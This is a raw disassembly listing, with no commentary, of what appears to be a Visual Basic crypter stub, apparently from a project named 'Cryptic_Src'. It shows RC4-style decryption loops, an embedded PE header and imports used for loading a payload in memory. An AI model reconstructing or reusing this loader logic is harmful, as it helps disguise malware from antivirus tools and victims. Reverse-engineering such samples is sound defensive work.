loc_40302D: ; CODE XREF: .text:00403025�j
mov eax, [ebp-3Ch]
cmp edi, 100h
mov cx, [eax+edi*2]
mov [eax+esi*2], cx
jb short loc_403046
call ds:dword_401064
loc_403046: ; CODE XREF: .text:0040303E�j
mov eax, [ebp-3Ch]
xor dx, dx
mov dl, bl
mov [eax+edi*2], dx
mov eax, [ebp-58h]
test eax, eax
jz short loc_403085
cmp word ptr [eax], 1
jnz short loc_403085
mov ebx, [ebp-18h]
mov edx, [eax+14h]
mov ecx, [eax+10h]
sub ebx, edx
cmp ebx, ecx
jb short loc_403077
call ds:dword_401064
mov eax, [ebp-58h]
loc_403077: ; CODE XREF: .text:0040306C�j
mov [ebp-0B8h], ebx
mov ebx, ds:dword_401064
jmp short loc_403096
; ---------------------------------------------------------------------------
loc_403085: ; CODE XREF: .text:00403057�j
; .text:0040305D�j
mov ebx, ds:dword_401064
call ebx
mov [ebp-0B8h], eax
mov eax, [ebp-58h]
loc_403096: ; CODE XREF: .text:00403083�j
cmp esi, 100h
jb short loc_4030A3
call ebx
mov eax, [ebp-58h]
loc_4030A3: ; CODE XREF: .text:0040309C�j
cmp edi, 100h
jb short loc_4030B0
call ebx
mov eax, [ebp-58h]
loc_4030B0: ; CODE XREF: .text:004030A9�j
mov ecx, [ebp-3Ch]
mov dx, [ecx+edi*2]
add dx, [ecx+esi*2]
jo loc_403205
and dx, 0FFh
jns short loc_4030D1
dec dx
or dx, 0FF00h
inc dx
loc_4030D1: ; CODE XREF: .text:004030C6�j
movsx ecx, dx
cmp ecx, 100h
mov [ebp-94h], ecx
jb short loc_4030E7
call ebx
mov eax, [ebp-58h]
loc_4030E7: ; CODE XREF: .text:004030E0�j
test eax, eax
jz short loc_403108
cmp word ptr [eax], 1
jnz short loc_403108
mov ebx, [ebp-18h]
mov edx, [eax+14h]
mov ecx, [eax+10h]
sub ebx, edx
cmp ebx, ecx
jb short loc_40310F
call ds:dword_401064
jmp short loc_40310C
; ---------------------------------------------------------------------------
loc_403108: ; CODE XREF: .text:004030E9�j
; .text:004030EF�j
call ebx
mov ebx, eax
loc_40310C: ; CODE XREF: .text:00403106�j
mov eax, [ebp-58h]
loc_40310F: ; CODE XREF: .text:004030FE�j
mov eax, [eax+0Ch]
mov ecx, [ebp-0B8h]
mov edx, [ebp-94h]
movzx cx, byte ptr [eax+ecx]
mov eax, [ebp-3Ch]
xor cx, [eax+edx*2]
call ds:dword_401080
mov ecx, [ebp-58h]
mov edx, [ecx+0Ch]
mov ecx, [ebp-18h]
mov [edx+ebx], al
mov eax, 1
add eax, ecx
jo loc_403205
mov [ebp-18h], eax
jmp loc_402F95
; ---------------------------------------------------------------------------
loc_403151: ; CODE XREF: .text:00402FA0�j
push 0
lea ecx, [ebp-7Ch]
push 40h
lea edx, [ebp-68h]
lea eax, [ebp-58h]
push ecx
push edx
mov [ebp-74h], eax
mov dword ptr [ebp-7Ch], 6011h
call ds:dword_40109C
lea eax, [ebp-68h]
push eax
call ds:dword_401010
mov edx, eax
lea ecx, [ebp-54h]
call ds:dword_4010F0
lea ecx, [ebp-68h]
call ds:dword_40100C
push offset loc_4031EF
jmp short loc_4031BA
; ---------------------------------------------------------------------------
test byte ptr [ebp-4], 4
jz short loc_4031A4
lea ecx, [ebp-54h]
call ds:dword_401108
loc_4031A4: ; CODE XREF: .text:00403199�j
lea ecx, [ebp-68h]
call ds:dword_40100C
lea ecx, [ebp-6Ch]
push ecx
push 0
call ds:dword_40103C
retn
; ---------------------------------------------------------------------------
loc_4031BA: ; CODE XREF: .text:00403193�j
mov esi, ds:dword_40103C
lea edx, [ebp-28h]
push edx
push 0
call esi
mov edi, ds:dword_401108
lea ecx, [ebp-2Ch]
call edi
lea ecx, [ebp-30h]
call edi
lea ecx, [ebp-80h]
lea eax, [ebp-48h]
push ecx
push 0
mov [ebp-80h], eax
call esi
lea edx, [ebp-58h]
push edx
push 0
call esi
retn
; ---------------------------------------------------------------------------
loc_4031EF: ; DATA XREF: .text:0040318E�o
mov ecx, [ebp-14h]
mov eax, [ebp-54h]
pop edi
pop esi
mov large fs:0, ecx
pop ebx
mov esp, ebp
pop ebp
retn 8
; ---------------------------------------------------------------------------
loc_403205: ; CODE XREF: .text:00402E6C�j
; .text:00402EE5�j ...
call ds:dword_4010AC
nop
nop
nop
nop
nop
sahf
sahf
sahf
sahf
cmp al, 32h
; ---------------------------------------------------------------------------
dw 0
dd 2 dup(0FFFFFFFFh), 334Ch, 1000h, 5 dup(0)
dd 335Ah, 3364h, 3372h, 3382h, 3392h, 33A4h, 33B4h, 33C0h
dd 33D4h, 33E4h, 33F2h, 3406h, 341Ch, 3430h, 3448h, 3458h
dd 346Ch, 347Eh, 80000256h, 3490h, 349Ah, 80000278h, 34A8h
dd 8000020Eh, 34B6h, 34C8h, 34E4h, 34FAh, 3506h, 3518h
dd 3526h, 3534h, 3548h, 3556h, 3560h, 3576h, 358Ah, 3598h
dd 35AAh, 800002CDh, 35BEh, 35CCh, 35DEh, 35E8h, 35FEh
dd 360Eh, 80000288h, 8000023Ah, 361Ah, 362Ah, 363Ch, 364Eh
dd 365Eh, 3670h, 80000064h, 367Eh, 368Eh, 80000269h, 36A0h
dd 36B8h, 36C2h, 36D2h, 36DCh, 36E6h, 36F8h, 3702h, 3712h
dd 0
dd 4256534Dh, 30364D56h, 4C4C442Eh, 0
a_cicos db '_CIcos',0
align 4
dd 615F0000h, 665F6A64h, 6E617470h, 0
a__vbaarymove_0 db '__vbaAryMove',0
align 4
a__vbafreevar_0 db '__vbaFreeVar',0
align 4
a__vbastrvarm_0 db '__vbaStrVarMove',0
dd 5F5F0000h, 4C616276h, 73426E65h, 7274h, 5F5F0000h, 45616276h
dd 646Eh, 5F5F0000h, 46616276h, 56656572h, 694C7261h, 7473h
dd 615F0000h, 665F6A64h, 5F766964h, 34366Dh, 615F0000h
dd 665F6A64h, 6D657270h, 31h
a__vbarecansi_0 db '__vbaRecAnsiToUni',0
align 4
db 5Fh ; _
db 5Fh ; _
db 76h ; v
db 62h ; b
db 61h ; a
db 53h ; S
db 65h ; e
db 74h ; t
db 53h ; S
db 79h ; y
db 73h ; s
db 74h ; t
db 65h ; e
db 6Dh ; m
; Zlibconst::_16390
@Zlibconst@_16390_1 db 'Error',0
dd 5F5F0000h, 52616276h, 65446365h, 75727473h, 7463h, 5F5F0000h
dd 48616276h, 75736572h, 6843746Ch, 4F6B6365h, 6A62h, 615F0000h
dd 665F6A64h, 5F766964h, 32336Dh, 5F5F0000h, 41616276h
dd 65447972h, 75727473h, 7463h, 615F0000h, 665F6A64h, 5F766964h
dd 6936316Dh, 0
a_adj_fdivr_m16 db '_adj_fdivr_m16i',0
dd 435F0000h, 6E697349h, 0
a__vbaerase_0 db '__vbaErase',0
align 4
dd 5F5F0000h, 43616276h, 74736B68h, 6Bh, 62765F5Fh, 6C694661h
dd 6F6C4365h, 6573h, 5F5F0000h, 47616276h, 72656E65h, 42657461h
dd 646E756Fh
db 73h ; s
; Zlibconst::_16390
@Zlibconst@_16390_2 db 'Error',0
align 4
dd 5F5F0000h, 41616276h, 6F437972h, 7274736Eh, 32746375h
dd 0
a__vbai2i4_0 db '__vbaI2I4',0
align 4
aDllfunctioncal db 'DllFunctionCall',0
dd 615F0000h, 665F6A64h, 61746170h, 6Eh, 62765F5Fh, 64655261h
dd 6D69h, 5F5F0000h, 52616276h, 6E556365h, 416F5469h, 69736Eh
dd 5F5F0000h, 55616276h, 32493149h, 0
a_cisqrt db '_CIsqrt',0
dd 5F5F0000h, 45616276h, 70656378h, 6E614874h, 72656C64h
dd 0
db 5Fh ; _
db 5Fh ; _
db 76h ; v
db 62h ; b
db 61h ; a
db 53h ; S
db 74h ; t
db 72h ; r
db 54h ; T
db 6Fh ; o
; Consts::_16914
@Consts@_16914_0 db 'Unicode',0
align 4
a_adj_fprem db '_adj_fprem',0
align 4
dd 615F0000h, 665F6A64h, 72766964h, 34366D5Fh, 0
a__vbafpexcepti db '__vbaFPException',0
align 10h
a__vbaubound_0 db '__vbaUbound',0
dd 5F5F0000h, 47616276h, 774F7465h, 3372656Eh, 0
a_cilog db '_CIlog',0
align 4
dd 5F5F0000h, 45616276h, 726F7272h, 7265764Fh, 776F6C66h
dd 0
db 5Fh ; _
db 5Fh ; _
db 76h ; v
db 62h ; b
db 61h ; a
db 46h ; F
db 69h ; i
db 6Ch ; l
db 65h ; e
; Consts::_16386
@Consts@_16386_0 db 'Open',0
align 10h
a__vbanew2_0 db '__vbaNew2',0
align 4
a__vbavar2vec_0 db '__vbaVar2Vec',0
align 4
a_adj_fdiv_m32i db '_adj_fdiv_m32i',0
align 4
dd 615F0000h, 665F6A64h, 72766964h, 32336D5Fh, 69h, 62765F5Fh
dd 72745361h
; Teeconst::_16586
@Teeconst@_16586_0 db 'Copy',0
align 10h
a_adj_fdivr_m32 db '_adj_fdivr_m32',0
align 10h
dd 615F0000h, 665F6A64h, 5F766964h, 72h, 62765F5Fh, 79724161h
dd 6B636F4Ch, 0
a__vbastrtoan_0 db '__vbaStrToAnsi',0
align 10h
dd 5F5F0000h, 52616276h, 65446365h, 75727473h, 6E417463h
dd 6973h, 435F0000h, 61746149h, 6Eh, 62765F5Fh, 72745361h
dd 65766F4Dh, 0
a_allmul db '_allmul',0
dd 435F0000h, 6E617449h, 0
a__vbaaryunlo_0 db '__vbaAryUnlock',0
align 4
dd 435F0000h, 70786549h, 0
a__vbafreeobj_0 db '__vbaFreeObj',0
align 4
a__vbafreestr_0 db '__vbaFreeStr',0
align 4
_text ends
; Section 2. (virtual address 00004000)
; Virtual size : 00000548 ( 1352.)
; Section size in file : 00000548 ( 1352.)
; Offset to raw data for section: 00004000
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_data segment para public 'DATA' use32
assume cs:_data
;org 404000h
dd 2 dup(0)
dword_404008 dd 14BCB0h, 0 dword_404010 dd 2 dup(0) dword_404018 dd 14BD20h, 0 dword_404020 dd 905A4Dh, 3, 4, 0FFFFh, 0B8h, 0 ; sub_401EE0+22B�o ...
dd 40h, 8 dup(0)
dword_40405C dd 0C8h ; sub_401EE0+314�r ...
dword_404060 dd 4550h ; sub_402660+278�o
db 4Ch, 1
word_404066 dw 3 ; DATA XREF: sub_401EE0+2B0�r
; sub_401EE0+2D6�r ...
dd 476AFBC2h, 2 dup(0)
dd 10F00E0h, 6010Bh, 3000h, 2000h, 0
dword_404088 dd 15AEh dd 1000h, 4000h
dword_404094 dd 400000h dd 2 dup(1000h), 4, 1, 4, 0
dword_4040B0 dd 6000h dword_4040B4 dd 1000h dd 10926h, 2, 100000h, 1000h, 100000h, 1000h, 0
dd 10h, 2 dup(0)
dd 3214h, 28h, 5000h, 10h, 10h dup(0)
dd 238h, 20h, 1000h, 110h, 6 dup(0)
dword_404158 dd 170670h ; sub_401EE0:loc_402247�r ...
align 10h
dword_404160 dd 14BD90h, 0 dword_404168 dd 2 dup(0) dword_404170 dd 2 dup(0) dd 400000h, 14BE18h
dword_404180 dd 7343B098h, 2, 0 ; .data:004043EC�o
dd offset dword_40170C+4
aAcDocumentsAnd:
unicode 0, <*\AC:\Documents and Settings\Pedro\Ambiente de trabalho\C>
unicode 0, <ryptic_Src\vbpStub.vbp>,0
dd 5Ch dup(0)
aICs db '¨°Cs',0
align 4
dd 3, 4043D0h, 6 dup(0)
dd 1, 4014D4h, 4043DCh, 40441Ch, 40445Ch, 7343B0C0h, 14BCB0h
dd 2 dup(0)
dd offset dword_404180
dd 0
dd offset dword_40138C+58h
aCs db 'аCs',0
align 10h
dd 0FFFFh, 7343B130h, 5 dup(0)
dd 7343B0C0h, 14BD20h, 0
dd 1, 404180h, 0
dd offset dword_401354
aCs_0 db 'аCs',0
align 10h
dd 0FFFFh, 7343B130h, 5 dup(0)
dd 7343B0C0h, 14BD90h, 0
dd 2, 404180h, 0
dd offset dword_40131C
aCs_1 db 'аCs',0
align 10h
dd 0FFFFh, 7343B130h, 12h dup(0)
dd 7C800000h
dword_4044D4 dd 7C80B4CFh ; resolved to->KERNEL32.GetModuleFileNameA dd 0
dd 7C800000h
dword_4044E0 dd 7C903151h ; resolved to->NTDLL.RtlMoveMemory dd 2 dup(0)
dword_4044EC dd 0 dd 2 dup(0)
dword_4044F8 dd 0 dd 2 dup(0)
dword_404504 dd 0 align 10h
dword_404510 dd 0 dd 2 dup(0)
dword_40451C dd 0 dd 2 dup(0)
dword_404528 dd 0 dd 2 dup(0)
dword_404534 dd 0 align 10h
dword_404540 dd 0 dword_404544 dd 0C6CE1Ch ; sub_401EE0+2C�r ...
_data ends
; Section 4. (virtual address 00006000)
; Virtual size : 00001000 ( 4096.)
; Section size in file : 00000200 ( 512.)
; Offset to raw data for section: 00005200
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_idata2 segment para public 'DATA' use32
assume cs:_idata2
;org 406000h
dd 80h dup(0)
align 1000h
_idata2 ends
end start